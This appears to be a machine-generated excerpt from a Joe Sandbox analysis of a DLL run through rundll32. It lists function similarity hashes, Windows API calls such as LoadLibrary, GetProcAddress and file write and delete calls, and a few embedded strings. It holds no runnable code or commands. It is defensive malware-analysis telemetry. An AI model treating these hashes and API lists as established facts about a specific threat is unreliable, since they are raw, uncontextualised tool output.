    • Opcode ID: 7c95d79a6932f591ae303023ad9bcf5e3cdb31da0663f78c422ae26a9081d948
    • Instruction ID: f282726e652966331a041c7bc3a4db22bf4aa52d0673ab6b8ef2981d8fbe3d09
    • Opcode Fuzzy Hash: 7c95d79a6932f591ae303023ad9bcf5e3cdb31da0663f78c422ae26a9081d948
    • Instruction Fuzzy Hash: F7D11732B1CA8687DB75CF16E19466AB7A6F7887A4F048134CB4E53B65DB3CE841CB00
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmp
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID: .
    • API String ID: 0-248832578
    • Opcode ID: 690e74d9563e45a385418573fd4113d3bcedef93829ea6a1ba73e3ce572bc25b
    • Instruction ID: 52f4f84719267b4443a0237a69dbf5c78896e787aaa9880f17867a0481f531fb
    • Opcode Fuzzy Hash: 690e74d9563e45a385418573fd4113d3bcedef93829ea6a1ba73e3ce572bc25b
    • Instruction Fuzzy Hash: C1310922B14E9145FB219A33E8447A97A96AB85BF4F188775DE6C07BF5DE3CD5018300
    Similarity
    • API ID: ExceptionRaise_clrfp
    • String ID:
    • API String ID: 15204871-0
    • Opcode ID: 94c2968fe9688432277f6621fdc766de3035e6626ea0afa950c38092a09ec5a0
    • Instruction ID: 8b8be4b047476fbaf27b86488a862edc934dfc5e98bb6822c47736a9947ce570
    • Opcode Fuzzy Hash: 94c2968fe9688432277f6621fdc766de3035e6626ea0afa950c38092a09ec5a0
    • Instruction Fuzzy Hash: 74B15B77600F898BEB26CF2AC8463687BA5F744B98F188961DA6D837B4CB3DD451C700
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: 0
    • API String ID: 3215553584-4108050209
    • Opcode ID: 4ff7d4c7d393e257493e51469c247c4ef46c7115a0845f9b5667b104312fce9a
    • Instruction ID: db7cfdaed86d33e9f882269956960432e5f508e8c15ccfd88e74b7f42484409d
    • Opcode Fuzzy Hash: 4ff7d4c7d393e257493e51469c247c4ef46c7115a0845f9b5667b104312fce9a
    • Instruction Fuzzy Hash: 67812622A18F0342EB688AE7804067D2398EF43B64F5415FEDD4E97AB5CF2DE946D740
    Similarity
    • API ID:
    • String ID: @
    • API String ID: 0-2766056989
    • Opcode ID: 97c779eb9e8cda604945b158143a5e17b1ebf053f90b93598c274ff6021d9a15
    • Instruction ID: 999046cb380076e96b3a5e44c7371b2e5817b67ca4f1a39dbb858c2b6eccfeea
    • Opcode Fuzzy Hash: 97c779eb9e8cda604945b158143a5e17b1ebf053f90b93598c274ff6021d9a15
    • Instruction Fuzzy Hash: A241C072714E5486EB08CF6AD9242A973A6F788FE0B59A036DE0D87774EE3CD046C300
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2a7933b61f368365aa16494b3c6ceea95da0c303d67b3bf46b553378c5ff89ad
    • Instruction ID: e7265b4d9134935b7ad023d598bab983dc97038752d56024db650367a2c1557f
    • Opcode Fuzzy Hash: 2a7933b61f368365aa16494b3c6ceea95da0c303d67b3bf46b553378c5ff89ad
    • Instruction Fuzzy Hash: E3F0A472A28A918ADB98CF69A442A293795F758390B408079D59883E24C73C80608F04
    Similarity
    • API ID: wcscat$wcscpy$DeleteFile$DirectoryEnvironmentExpandRemoveStrings
    • String ID:
    • API String ID: 2221106753-0
    • Opcode ID: e4d83268c653e65681527fc978cd474a44451df63d8d25433c1058a36e54ff64
    • Instruction ID: 7069be29a495b9c4d11c911955dc9908b0f8a7f38bf199982dcd3ea5ac098c9c
    • Opcode Fuzzy Hash: e4d83268c653e65681527fc978cd474a44451df63d8d25433c1058a36e54ff64
    • Instruction Fuzzy Hash: 4281F23261CE8685EB20EB62E4913BEB325FBD5754F801076E68D469B9DF3CD909CB40
    Similarity
    • API ID: wcscat$wcscpy$DeleteFile$DirectoryEnvironmentExpandRemoveStrings
    • String ID:
    • API String ID: 2221106753-0
    • Opcode ID: 3f08b2f3857772e7bd4f137949d595b3f2607b7651ef9369e1e742ba60cebf5d
    • Instruction ID: 302b3a8bb670bc8e18199c52201b7edbefd2b4d99bced4d2b90c42442b7bbdb1
    • Opcode Fuzzy Hash: 3f08b2f3857772e7bd4f137949d595b3f2607b7651ef9369e1e742ba60cebf5d
    • Instruction Fuzzy Hash: 7A514E6261CE8695DF30EB16E4901EEA325FBC1754F801076E68E439B9DE2CD90DCB40
    Similarity
    • API ID: AddressProcwcscat$LibraryLoad$FileModuleName_vswprintf_s_lswprintf
    • String ID: "%ls",%ls %ls
    • API String ID: 1950665352-3684409233
    • Opcode ID: 7ac86cf73ec6f21287da482e3f960a38ae5f8bf6a852bf3f3cc1b7f49ea5b46a
    • Instruction ID: 93424860df9af8b5c30b0c5083887fa5b65d9c212f057991072f10763ff106d2
    • Opcode Fuzzy Hash: 7ac86cf73ec6f21287da482e3f960a38ae5f8bf6a852bf3f3cc1b7f49ea5b46a
    • Instruction Fuzzy Hash: 53B1D43291DE8185E760DB62E4943AEB3A8FBC4764F500179E6CD46AB9DF7CD848CB40
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
    • API String ID: 3215553584-2617248754
    • Opcode ID: d61291fe73c288b30c6e1b7a2f036aee91b398c5310b8ac284d514a42b418a66
    • Instruction ID: 1c11f071706ae4aca7ecbc77af1ea672605f786ee72447c4184551af0f7be422
    • Opcode Fuzzy Hash: d61291fe73c288b30c6e1b7a2f036aee91b398c5310b8ac284d514a42b418a66
    • Instruction Fuzzy Hash: 20418932B09F8589F706CB66E8517AD33A9EB043A8F50457AEE5C07BA5EE3CD425C344
    Similarity
    • API ID: wcscat$Sleepwcscpy$CloseCreateHandleMutex
    • String ID:
    • API String ID: 859675624-0
    • Opcode ID: 813a8c226c73e745290e7a532b8a80e84a097e3f285a833d78f3018bb7183fde
    • Instruction ID: c988ebc1a0fb5f507bf5b898f4d29bc48a487d9180f1623f9a67c055d64636ef
    • Opcode Fuzzy Hash: 813a8c226c73e745290e7a532b8a80e84a097e3f285a833d78f3018bb7183fde
    • Instruction Fuzzy Hash: D7513F32518E8186EB10DB62E4943AFB7A4FBC47A4F40017AE68D47AB9DF3CD945CB40
    APIs
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE11508FB7
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE11508FF5
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE11509033
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE1150906A
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE115090A8
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE115090E6
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE11509124
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE115087EC), ref: 00007FFE11509162
    Similarity
    • API ID: AddressProc$LibraryLoad
    • String ID:
    • API String ID: 2238633743-0
    • Opcode ID: a17128498188afb4e7faefc0956fe52f2ccca10067907e4c810cdd07455c527e
    • Instruction ID: 57e651ab465eb849ec8e515b3be241b2d1d5ae6f7f5664ef57f4dfa377268bb4
    • Opcode Fuzzy Hash: a17128498188afb4e7faefc0956fe52f2ccca10067907e4c810cdd07455c527e
    • Instruction Fuzzy Hash: 5C919732919E86C5EB509BA2F85436A73B8FB84760F5000B9E98D83A75DF7CE484CB51
    APIs
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508D6A
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508DA8
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508DDF
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508E1D
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508E5B
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508E99
    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508ED0
    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11508AB6), ref: 00007FFE11508F0E
    Similarity
    • API ID: AddressProc$LibraryLoad
    • String ID:
    • API String ID: 2238633743-0
    • Opcode ID: fce1d11985e05978db1864bd94c0c65cdcffbee78ce75ed191d8cbf05e198f64
    • Instruction ID: 9b75cf03af4b7267fbc72ab0355520e55358c1244edf914040ebfe95a905fb6c
    • Opcode Fuzzy Hash: fce1d11985e05978db1864bd94c0c65cdcffbee78ce75ed191d8cbf05e198f64
    • Instruction Fuzzy Hash: D861B532D19E46C5EB50DBA2E89437A63B8FB84770F5001B9E98D826B5DF7CE8848711
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: +$-
    • API String ID: 3215553584-2137968064
    • Opcode ID: 71210f2582e464a0a471a66a04251737dbaa018989f03128c340a2212adcaa4b
    • Instruction ID: c2add108f8f0eb45061016275070246627456d95ae6c044662e557e5ca90db99
    • Opcode Fuzzy Hash: 71210f2582e464a0a471a66a04251737dbaa018989f03128c340a2212adcaa4b
    • Instruction Fuzzy Hash: 4612C526E0DD6345FB249A97D0442BC669EEF40774FEC41BAD69A432F0DF2CE681A704
    Similarity
    • API ID: AddressProc$File$DeleteLibraryLoadModuleName
    • String ID:
    • API String ID: 3615269725-0
    • Opcode ID: e99044e11731c57dbd82a7436a7fcb8d1a793e2e708b2735417dfccd9acd41f5
    • Instruction ID: a2b284ba31b98c5263f9a6bbe8ccba939f2b1aa8ce557931def97fee63388fef
    • Opcode Fuzzy Hash: e99044e11731c57dbd82a7436a7fcb8d1a793e2e708b2735417dfccd9acd41f5
    • Instruction Fuzzy Hash: 9651F732918E8182EB609B62F49436EB7B8FBC4764F401179E6CD42AB9DF7CD549CB40
    Similarity
    • API ID: CloseOpen$EnumQueryValue
    • String ID:
    • API String ID: 1729155201-0
    • Opcode ID: 9c4782bd5d54c8b2f4254a5c0b6a80ecf7c17107a6a5495685acaccf18321a28
    • Instruction ID: 27c8fa2d704b825dba5a93347db9db633ee00adeffd945a558147346b438a0b0
    • Opcode Fuzzy Hash: 9c4782bd5d54c8b2f4254a5c0b6a80ecf7c17107a6a5495685acaccf18321a28
    • Instruction Fuzzy Hash: FC411932618E8186E760DB66F49476EB7B4FB857A4F500135EACD82A78DF7CE508CB40
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 5e573ed8c4ee126ded1d13513922153a32cd34e60b3b0e3fa287f2206dab5a33
    • Instruction ID: cc9aacfd8f5b641c221de7f121547107e6e5d2f1c4f37653d4cb22951614fd3b
    • Opcode Fuzzy Hash: 5e573ed8c4ee126ded1d13513922153a32cd34e60b3b0e3fa287f2206dab5a33
    • Instruction Fuzzy Hash: 18F04926A19F8281EF468B52F4843BD63B9AF88BA0F481079E90F46674EF3CD484C700
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID:
    • API String ID: 3215553584-0
    • Opcode ID: 24a19ad1fa68cb3dd82936b017d67ecca1e952e8204401616d57021115da0df1
    • Instruction ID: 0e78e85b20edebac902e5ac30c753b56ed2985ebc0d18a651ed602068515d586
    • Opcode Fuzzy Hash: 24a19ad1fa68cb3dd82936b017d67ecca1e952e8204401616d57021115da0df1
    • Instruction Fuzzy Hash: 0C81C236E18E1289F7629B6B98406BD37AABB447A8F4041B5DE0E537B5CF3CE542C710
    Similarity
    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
    • String ID:
    • API String ID: 3659116390-0
    • Opcode ID: 1c8dbfc0f9a6c678fe6545e0ff9f4c6e15195c03dc9945568d828b41c0f1c9a2
    • Instruction ID: 22a5df735d7996c4023eb6aa8b3373d0b0ece43d4a213338e9b9d8c14ee672da
    • Opcode Fuzzy Hash: 1c8dbfc0f9a6c678fe6545e0ff9f4c6e15195c03dc9945568d828b41c0f1c9a2
    • Instruction Fuzzy Hash: 25519D72A14E5189E711CB66E4443AC3BBAFB44BA8F048175DE4E47AB8DF7CD145C710
    APIs
    • GetProcAddress.KERNEL32(?,00000000,00000006,00007FFE115110E7,?,?,00000000,00007FFE1150FA7F,?,?,?,00007FFE1150F235), ref: 00007FFE11510F2E
    Similarity
    • API ID: AddressProc
    • String ID:
    • API String ID: 190572456-0
    • Opcode ID: e15ac4d827317ed69b53cec698e8523a8fc4d4abecf9bddf3b96c284d10d04bd
    • Instruction ID: 8bff9acdda925c9b115c40c7d1af2da06b4af1e4dafccaf8eb61ece0e36bddd6
    • Opcode Fuzzy Hash: e15ac4d827317ed69b53cec698e8523a8fc4d4abecf9bddf3b96c284d10d04bd
    • Instruction Fuzzy Hash: 8B41CF62B0DE4285FB169B53A8046B663ABBF54BF0F094675DD2D4B7B4EE3CE4448300
    Similarity
    • API ID: File$ByteCharHeapMultiPointerWide$AllocateCloseCreateHandleProcessRead
    • String ID:
    • API String ID: 4053899944-0
    • Opcode ID: b79db9a9037c3a8fbb997c2798cabdda90be4f8e10c041602780bc7ef26bfb75
    • Instruction ID: 29618f1e0c5af35c9ca59c353de1aae8d83d2483c1a65b3601c5a924bcb70c7b
    • Opcode Fuzzy Hash: b79db9a9037c3a8fbb997c2798cabdda90be4f8e10c041602780bc7ef26bfb75
    • Instruction Fuzzy Hash: 4E410436A0CA8186E3609B56F45836FB7A4FBC17A4F200178EA8D47AB9DF7DD444CB00
    Similarity
    • API ID: _set_statfp
    • String ID:
    • API String ID: 1156100317-0
    • Opcode ID: 328a82265769b0ffb80da814976cc54abad42b11a73727b237c9197753426e8a
    • Instruction ID: 38b5651e8df42a456765f60df08506e5f82b31a800449f87307be81b9b3d630e
    • Opcode Fuzzy Hash: 328a82265769b0ffb80da814976cc54abad42b11a73727b237c9197753426e8a
    • Instruction Fuzzy Hash: 5E11E337E9CE0341F7A611AEE4423BB014BAF443B4F0542B8EA6E025F6CEECAA414200
    Similarity
    • API ID: ByteCharErrorFileLastMultiWideWrite
    • String ID: U
    • API String ID: 2456169464-4171548499
    • Opcode ID: 6eddbc036e5050aeab1b959d2b89e7b8800bfca6deecbe5a24fdc43e9229e2a6
    • Instruction ID: 29ca70d333ea955002ac13d3083596fb0ae5ce26dd589cc0475557bc83b81e57
    • Opcode Fuzzy Hash: 6eddbc036e5050aeab1b959d2b89e7b8800bfca6deecbe5a24fdc43e9229e2a6
    • Instruction Fuzzy Hash: A141D522B18A4186DB21CF66E4043BA7766FB887A4F804131EE4D877B8EF7CD441CB50
    APIs
    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFE1150DBB7), ref: 00007FFE115124F5
    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFE1150DBB7), ref: 00007FFE11512557
    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFE1150DBB7), ref: 00007FFE11512591
    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFE1150DBB7), ref: 00007FFE115125BB
    Similarity
    • API ID: ByteCharEnvironmentMultiStringsWide$Free
    • String ID:
    • API String ID: 1557788787-0
    APIs
      • Part of subcall function 00007FFE115026A0: MultiByteToWideChar.KERNEL32 ref: 00007FFE115026D5
      • Part of subcall function 00007FFE115026A0: MultiByteToWideChar.KERNEL32 ref: 00007FFE11502729
    • CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11503FBB), ref: 00007FFE115041DA
    • SetFilePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11503FBB), ref: 00007FFE115041FA
    • WriteFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11503FBB), ref: 00007FFE11504220
    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFE11503FBB), ref: 00007FFE11504244
    Similarity
    • API ID: File$ByteCharMultiWide$CloseCreateHandlePointerWrite
    • String ID:
    • API String ID: 2756471129-0
    APIs
    Similarity
    • API ID: ErrorLast$abort
    • String ID:
    • API String ID: 1447195878-0
    APIs
    Similarity
    • API ID: File$CloseCreateHandlePointerWrite
    • String ID:
    • API String ID: 3604237281-0
    APIs
    Similarity
    • API ID: CriticalInitializeSection__vcrt___vcrt_initialize_locks__vcrt_initialize_ptd__vcrt_initialize_pure_virtual_call_handler__vcrt_uninitialize_locks
    • String ID:
    • API String ID: 1318428292-0
    APIs
    Strings
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: *
    • API String ID: 3215553584-163128923
    APIs
    Strings
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: e+000$gfff
    • API String ID: 3215553584-3030954782
    APIs
    Strings
    Similarity
    • API ID: FileModuleName_invalid_parameter_noinfo
    • String ID: C:\Windows\system32\rundll32.exe
    • API String ID: 3307058713-1534550049
    APIs
    Strings
    Similarity
    • API ID: FileHandleType
    • String ID: @
    • API String ID: 3000768030-2766056989
    APIs
    Strings
    Similarity
    • API ID: ErrorFileLastModuleName
    • String ID: Main Returned.
    • API String ID: 2776309574-1078862748
    APIs
    Strings
    Similarity
    • API ID: ErrorFileLastModuleName
    • String ID: Main Invoked.
    • API String ID: 2776309574-1952101238